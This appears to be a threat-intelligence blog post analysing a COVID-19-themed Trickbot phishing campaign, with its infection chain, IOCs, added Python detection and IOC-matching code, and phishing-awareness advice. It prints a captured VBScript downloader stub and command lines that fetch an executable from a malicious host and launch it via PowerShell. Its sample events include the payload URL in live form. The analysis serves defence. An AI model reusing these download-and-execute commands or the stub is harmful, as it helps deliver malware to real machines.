Threat/APT groups leveraging the COVID-19 (novel coronavirus) epidemic to spread malware.

Across the globe, numerous cyber attacks associated with COVID-19 were reported in the past month. Many threat groups have been taking advantage of the epidemic to send malspam, tricking users into clicking embedded links or opening attached documents so that malware is dropped on their devices. Trickbot, Emotet, KPOT, Zloader, NjRAT and other malware families have all been observed delivered under the guise of COVID-19 documents, sites or links. Hackers and threat groups are simply exploiting the fear of this virus.

Throughout March 2020, attackers aggressively exploited fear of COVID-19 in several ways:

  1. Emails carrying a coronavirus update or a link to an update site.
  2. Emails carrying a coronavirus awareness document.
  3. Coronavirus-themed phishing emails.
  4. Many newly registered malicious sites posing as coronavirus trackers and update pages.

Brief summary of some of these campaigns:

Actors behind the Metamorfo trojan launched a COVID-19-themed spam campaign to spread their malware. As in other uses of this lure, victims are enticed to follow a malicious link to receive “more or updated information” on COVID-19 in their region. The link leads to a malicious MSI installer that downloads additional malware and establishes persistent C2 communications.

A similar coronavirus-themed email campaign was used to spread the Nanocore trojan. Victims are enticed with misinformation about COVID-19 vaccine updates, and the malicious downloads are named to match the theme (e.g. “COVID-19 Vaccine.gz”).

Analysis – COVID-19 themed Trickbot campaign

In this blog we discuss one such coronavirus-themed Trickbot email campaign. We studied the recent Trickbot infection process and summarise the payload domains, the levels of obfuscation and other possible IOCs.

According to open-source intelligence, two of the most commonly seen COVID-19 Trickbot lures were:

  • hxxps://corona-virus2019[dot]us/info/march/19/important/check/COVID-19.MARCH19.358972821.doc
  • 8efc43a293d0d145c6ba24b5d167e227 – “Covid_19_test_form.doc”

Technical analysis: Chain of events

hxxps://corona-virus2019[dot]us/info/march/19/important/check/COVID-19.MARCH19.358972821.doc

Delivery method – In some cases an email with a legitimate-looking link was observed, asking the user to click through for the latest coronavirus update. In other cases a legitimate-looking malicious document, claiming to be a coronavirus awareness file or a test enrolment form, was sent directly to users as an attachment.

Execution:

  • When the link is clicked, the maldoc “COVID-19.MARCH19.358972821.doc” is downloaded.
  • When the user opens the maldoc, it spawns a command prompt in the background with the following command and file modification:
    Command: cmd /c c:\1903Data\Personal2.cmd
    File modification:  C:\1903Data\LpkWers1.vbs
  • The written file is a plain-text VBScript, reproduced below as captured. It is a small downloader stub: it reads the download URL and the destination path from its command-line arguments (Axel(0) and Axel(1)) and creates a WinHttp.WinHttpRequest.5.1 object to fetch the payload. The ProgID is split into two concatenated strings, and the script is padded with news-headline comments and repeated Sleep calls, most likely to frustrate signature matching. Note that the Sleep calls are made on an undefined name (cscript rather than the WScript object), so with On Error Resume Next in effect they are silently skipped.

Dim Axel, TVphone, X, Y, Z, DbgHelp, TGF
On Error Resume Next
'Pics of the day, March 4, 2020
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
'DRC discharges last Ebola patient amid celebrations
'African presidents lead anti-coronavirus efforts
'View: the futility of Pompeo's anti-China message in Africa
'LOF
Set Axel = Wscript.Arguments
Set TVphone = CreateObject("WinHttp.WinHtt" + "pRequest.5.1")
Z = Axel(0)
DbgHelp = Axel(1)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)

  • cmd.exe spawns the following child processes:
    • cscript.exe
    • powershell.exe
    • netstat.exe
    • tracert.exe

  • Child process 1:
    cscript //nologo c:\1903Data\LpkWers1.vbs hxxp://rekenjura[dot]com/QW8[dot]exe C:\1903Data\LMNBU5.exe
    The script host runs the dropped VBS downloader with two arguments, the payload URL and the destination path. It makes a malicious HTTP request to hxxp://rekenjura[dot]com/QW8[dot]exe and writes the response to C:\1903Data\LMNBU5.exe, overwriting any existing file.
  • Child processes 2 and 3:
    tracert.exe and netstat.exe were run to discover the host's network connections and routes, reconnaissance that the malware can later use for lateral movement. During this step a connection to hxxps://www[dot]marketwatch[dot]com/investing was noted.
  • Child process 4:
    PowerShell silently starts the downloaded executable (saved as LMNBU5.exe) after a short delay: “powershell -C Sleep -s 7;Saps 'C:\1903Data\LMNBU5.exe'” (Sleep and Saps are the built-in PowerShell aliases for Start-Sleep and Start-Process).
  • powershell.exe in turn spawns the payload with the command: “C:\1903Data\LMNBU5.exe”
    This executable copies itself to another location under a new, non-Latin file name, “βιβλίαପୁସ୍ତକΔεपुस्.exe”, starts that copy, and makes file modifications in ProgramData to maintain persistence.
  • cmdChild: “C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe”
    cmdParent: “C:\1903Data\LMNBU5.exe”
    image: C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe
    device: DISK_FILE_SYSTEM
    name: C:\ProgramData\βιβλίାପୁସ୍ତକΔεपुस्.exe
    object: FILE
  • The renamed copy was also observed making file modifications and deleting registry keys. It touches the Zone.Identifier alternate data stream of its own copy (the stream that carries the Mark-of-the-Web for files downloaded from the Internet) and deletes the Internet Settings ZoneMap keys in both the machine hive and the user's hive:
    Filemods: C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe\:Zone.Identifier:$DATA
    Registry key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    HKU\S-1-5-21-3712457824-2419000099-45725732-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Further activity observed from the dropped payload:
    Copies itself into the user's temp directory under yet another name – C:\Users\Johnson\AppData\Local\Temp\y0OsjqsxVxM88X4u67hSGa.exe
    Copies itself into ProgramData as described above – C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe
    Starts the console program C:\Windows\system32\svchost.exe

Persistence technique used in this campaign

  • The payload βιβλίαପୁସ୍ତକΔεपुस्.exe executed a scheduled-task command, loading the Task Scheduler library C:\Windows\System32\taskschd.dll to do so.
  • During the whole process a browser extension modification was also observed:
    C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7519.422.0.3_0_metadata\computed_hashes.json
  • Privilege escalation by bypassing User Account Control was detected for the dropped executables, which were launched through the COM surrogate process DllHost.exe:
    • DllHost.exe – C:\Users\admin\Downloads\QW8 (1).exe
    • DllHost.exe – C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe
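The execution chain and persistence steps above translate directly into behavioural detections. The following is an added example, not code from the original post: a small detector that scores Sysmon-like events for the stages described (Office spawning cmd.exe, a script host running a .vbs with a URL argument, the delayed Start-Process, netstat/tracert from the same shell, a non-ASCII executable in ProgramData, the Zone.Identifier stream being touched, the ZoneMap keys being deleted, and DllHost.exe launching a binary from a user-writable path). The event shape (dicts with type, image, parent, cmdline, target) is an assumption of this example, as is the interpretation of the DllHost.exe entries as a COM-surrogate launch; the sample timeline is constructed to mirror the chain in the post.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
RECON_TOOLS = {"netstat.exe", "tracert.exe", "ipconfig.exe", "nltest.exe"}
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\1903data\\")

URL_RE = re.compile(r"https?://", re.I)
SAPS_RE = re.compile(r"\b(saps|start-process)\b", re.I)
SLEEP_RE = re.compile(r"\b(sleep|start-sleep)\b", re.I)


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the names of the rules a single event triggers."""
    hits = []
    kind = ev.get("type")
    image_path = ev.get("image", "")
    image = basename(image_path)
    parent = basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "")
    target = ev.get("target", "")

    if kind == "process":
        # Maldoc stage: Office spawning cmd.exe (cmd /c Personal2.cmd).
        if parent in OFFICE_APPS and image == "cmd.exe":
            hits.append("office_spawns_cmd")
        # cscript/wscript running a .vbs with a URL on its command line:
        # the downloader-stub shape (LpkWers1.vbs <url> <dest>).
        if image in SCRIPT_HOSTS and ".vbs" in cmd.lower() and URL_RE.search(cmd):
            hits.append("script_host_downloader")
        # "powershell -C Sleep -s 7;Saps '<exe>'": delayed Start-Process.
        if image == "powershell.exe" and SAPS_RE.search(cmd) and SLEEP_RE.search(cmd):
            hits.append("powershell_delayed_start")
        # netstat/tracert launched from a shell.
        if image in RECON_TOOLS and parent == "cmd.exe":
            hits.append("recon_from_cmd")
        # COM surrogate starting a binary from a user-writable location
        # (assumed reading of the DllHost.exe entries in the post).
        if parent == "dllhost.exe" and image_path.lower().startswith(USER_WRITABLE):
            hits.append("dllhost_launches_user_writable_exe")
        # Payload copy in ProgramData with a non-ASCII file name.
        if image_path.lower().startswith("c:\\programdata\\") and any(ord(c) > 127 for c in image):
            hits.append("non_ascii_exe_in_programdata")
    elif kind == "file" and target.lower().endswith(":zone.identifier:$data"):
        # Mark-of-the-Web stream of the dropped copy is touched.
        hits.append("motw_stream_touched")
    elif kind == "registry_delete" and target.upper().endswith("\\INTERNET SETTINGS\\ZONEMAP"):
        hits.append("zonemap_deleted")
    return hits


def score_host(events):
    """Correlate per-event hits for one host into a sorted rule list and a verdict."""
    fired = set()
    for ev in events:
        fired.update(check_event(ev))
    # Two or more independent stages are worth paging on; a single hit
    # (e.g. an admin's netstat from cmd.exe) is only a hunting lead.
    verdict = "alert" if len(fired) >= 2 else ("lead" if fired else "clean")
    return sorted(fired), verdict


# Constructed sample timeline mirroring the chain in the post (the post
# defangs the payload URL; a real log carries it live).
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c c:\1903Data\Personal2.cmd"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript //nologo c:\1903Data\LpkWers1.vbs http://rekenjura.com/QW8.exe C:\1903Data\LMNBU5.exe"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\NETSTAT.EXE",
     "cmdline": "netstat -an"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -C Sleep -s 7;Saps 'C:\1903Data\LMNBU5.exe'"},
    {"type": "process", "parent": r"C:\1903Data\LMNBU5.exe", "image": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe",
     "cmdline": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe"},
    {"type": "file", "image": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe",
     "target": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe:Zone.Identifier:$DATA"},
    {"type": "registry_delete", "image": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe",
     "target": r"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"},
    {"type": "process", "parent": r"C:\Windows\System32\DllHost.exe", "image": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe",
     "cmdline": "C:\\ProgramData\\βιβλίαପୁସ୍ତକΔεपुस्.exe"},
]

# Constructed benign noise: an admin checking connections by hand.
BENIGN_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\NETSTAT.EXE",
     "cmdline": "netstat -an"},
]

if __name__ == "__main__":
    print(score_host(SAMPLE_EVENTS))
    print(score_host(BENIGN_EVENTS))
```

The point of the two-stage threshold is that each rule on its own is noisy (admins run netstat, installers touch Zone.Identifier streams), while the combination of an Office-spawned shell, a script-host download and a delayed Start-Process on the same host is specific enough to act on.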

IOCs [ Indication of compromise ]

So far more than 38k domains have been observed spreading this malware, and there is as yet no definitive list of IOCs for the COVID-19 campaigns. Many security researchers and analysts are collecting and updating IOCs to fight the COVID-19-themed campaigns.

Some of the IOCs can be found here: more than 40k coronavirus-related domains have been registered since the outbreak began, and there is no exact count of how many of them are being used by attackers to deliver malware.
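Indicators in write-ups like this one are defanged (hxxp, [dot]) so they cannot be clicked by accident, but they have to be refanged before they can be matched against proxy or mail-gateway logs, and a bare domain match should cover subdomains without matching look-alike suffixes. The following is an added example, not code from the original post: refang/defang helpers plus a matcher that checks constructed observations (URLs, hosts and an MD5) against the two URLs and the hash listed earlier in this post. The observations are made up for the example; only the indicator values come from the post.

```python
import re
from urllib.parse import urlsplit

DEFANG_TOKENS = [("hxxps://", "https://"), ("hxxp://", "http://"),
                 ("[dot]", "."), ("(dot)", "."), ("[.]", "."), ("[:]", ":")]


def refang(indicator):
    """Turn a defanged URL or host back into its live form."""
    out = indicator
    for token, live in DEFANG_TOKENS:
        out = re.sub(re.escape(token), live, out, flags=re.I)
    return out


def defang(url):
    """Defang a live URL the way this post does: hxxp scheme and [dot] in the host."""
    parts = urlsplit(url)
    host = parts.netloc.replace(".", "[dot]")
    scheme = parts.scheme.replace("http", "hxxp")
    path = parts.path + (("?" + parts.query) if parts.query else "")
    return f"{scheme}://{host}{path}"


# Indicators quoted in the post, stored defanged and refanged on load.
IOC_URLS = [refang(u) for u in (
    "hxxps://corona-virus2019[dot]us/info/march/19/important/check/COVID-19.MARCH19.358972821.doc",
    "hxxp://rekenjura[dot]com/QW8[dot]exe",
)]
IOC_DOMAINS = {urlsplit(u).hostname for u in IOC_URLS}
IOC_MD5 = {"8efc43a293d0d145c6ba24b5d167e227"}  # Covid_19_test_form.doc


def host_matches(host, domain):
    """True for the domain itself or any subdomain of it, not for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def match(observation):
    """Return the matching indicator (live form) or None.

    observation: {"type": "url" | "host" | "md5", "value": str}
    """
    kind, value = observation["type"], observation["value"].strip()
    if kind == "md5":
        return value.lower() if value.lower() in IOC_MD5 else None
    if kind == "url":
        live = refang(value)
        if live in IOC_URLS:
            return live
        host = urlsplit(live).hostname or ""
    else:
        host = refang(value)
    for domain in IOC_DOMAINS:
        if host_matches(host, domain):
            return domain
    return None


# Constructed observations, e.g. from a proxy log and a mail-gateway report.
OBSERVATIONS = [
    {"type": "url", "value": "http://rekenjura.com/QW8.exe"},
    {"type": "url", "value": "https://www.corona-virus2019.us/info/march/20/update.doc"},
    {"type": "md5", "value": "8EFC43A293D0D145C6BA24B5D167E227"},
    {"type": "host", "value": "rekenjura.com.example.net"},
]

if __name__ == "__main__":
    for obs in OBSERVATIONS:
        print(obs["value"], "->", match(obs))
```

The last observation is deliberately a domain that merely starts with an indicator; host_matches rejects it because the suffix check requires a dot before the indicator domain, which is the usual mistake in hand-written endswith matching.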

Recommendation

For non-technical individuals:

Spotting a phishing email is becoming increasingly difficult, and many scams will even trick computer experts. However, there are some common signs to look out for:

  • Authority – Is the sender claiming to be from someone official (like your bank, doctor, a solicitor, government department)? Criminals often pretend to be important people or organisations to trick you into doing what they want.
  • Urgency – Are you told you have a limited time to respond (like in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.
  • Emotion – Does the message make you panic, fearful, hopeful or curious? Criminals often use threatening language, make false claims of support, or tease you into wanting to find out more.
  • Scarcity – Is the message offering something in short supply (like concert tickets, money or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.
  • Current events – Are you expecting to see a message like this? Criminals often exploit current news stories, big events or specific times of year (like tax reporting) to make their scam seem more relevant to you.

Your bank (or any other official source) should never ask you to supply personal information in reply to an email. If you have any doubts about a message, call them directly. Do not use the phone numbers or email addresses given in the message; visit the official website instead.

  • Avoid clicking on links in unsolicited emails and be wary of email attachments.
  • Treat any email whose subject line mentions COVID-19 with caution. Do not be taken in simply because the message appears to come from your doctor or from the WHO.
  • Use trusted sources—such as legitimate, government websites—for up-to-date, fact-based information about COVID-19.
  • Do not reveal personal or financial information in an email, and do not respond to email solicitations for this information.
  • Verify a charity’s authenticity before making donations. Review the Federal Trade Commission’s page on Charity Scams for more information.

For more detailed phishing advisories, refer to the links below:

  • Detailed phishing awareness and mitigations – http://www.securitystreets.com/how-to-protect-yourself-against-phishing/
  • https://www.us-cert.gov/ncas/alerts/aa20-099a

We hope this helps you fight COVID-19-themed campaigns. If you have any questions about this, please reach out to us.

Say no to #phishing #fightCOVID19 !!
